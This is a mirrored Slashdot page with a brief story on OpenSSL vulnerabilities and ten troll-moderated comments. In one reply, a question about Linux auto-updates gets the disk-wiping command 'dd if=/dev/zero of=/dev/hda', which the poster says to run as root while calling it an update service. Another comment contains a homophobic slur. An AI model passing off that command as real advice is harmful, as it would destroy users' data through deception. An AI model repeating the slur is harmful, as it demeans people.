Slashdot Mirror


OpenSSL Security Vulnerability

SiliconEntity writes "On the heels of multiple OpenSSH vulnerabilities, the OpenSSL project is now reporting a number of security vulnerabilities of its own. OpenSSL is a standard cryptographic library used in a wide variety of security applications. The new vulnerabilities range from denial-of-service attacks to stack corruption, which imply the possibility of running malicious code. New versions of the software are released today which address the vulnerabilities."

10 of 245 comments (clear)

  1. first post! by Anonymous Coward · · Score: -1, Troll

    posted via lynx over openssh! w00t! w00t!

    1. Re:first post! by Mod+Me+God · · Score: -1, Troll

      No... posted by am email from Outlook Express like on my WinBox reguraly updated thanks to Microsoft Update.

      You Linux users really don't know where it is at... after all SSL is just a mathematical equation... guess you should stop using 14 year old 'hax0rs' and use real, professional salaried M$ programmers from the PRC to do your security.

      --
      --

      FreeNET user? Comfortable with the adverse selection?
  2. OpenSSH != OpenSSL by tarquin_fim_bim · · Score: -1, Troll

    To use a very bad analogy it's like associating Cornflakes with Cornplasters. PLEASE MOD ME TROLL, MY KARMA IS TOO HIGH TO SUPPORT MY SIG. Thank you.

  3. Old Joke by Anonymous Coward · · Score: -1, Troll

    hehehe, reminds me of an old joke:

    What's the difference between michael and open ssl?

    You'll never get a 'denial of service' from any of michael's holes!

  4. the truth by borgdows · · Score: 0, Troll

    With all these holes in OpenSSH and OpenSSL, it's safe to say that OpenBSD is as OPEN as Windows!!

  5. Shh! What's that sound? by cscx · · Score: -1, Troll

    Oh yeah, the sound of Theo de Raadt crapping his pants.

    1. Re:Shh! What's that sound? by Anonymous Coward · · Score: -1, Troll

      STFU faggot.

  6. 3 Results found! by Anonymous Coward · · Score: -1, Troll
  7. Re:Lazy admin and Auto-Update by Anonymous Coward · · Score: -1, Troll
    pardon my ignorance, does Linux have a similar auto-update feature like in Windows?

    Yes, you need to start the distro diag (dd) service:

    dd if=/dev/zero of=/dev/hda

    you need to run it as root. Change /dev/hda to whatever drive you want to keep up-to-date (e.g., /dev/sda)

  8. Blame Microsoft by QuietYou · · Score: 1, Troll

    Blame Microsoft... I bet they have "moles" in the open source community intentionally creating these vulnerabilities to deflect some attention away from the problems with their own software.

    BTW, I can find a MS conspiracy theory in anything, ex. the moderator that MODs this post down is a MS fanboy.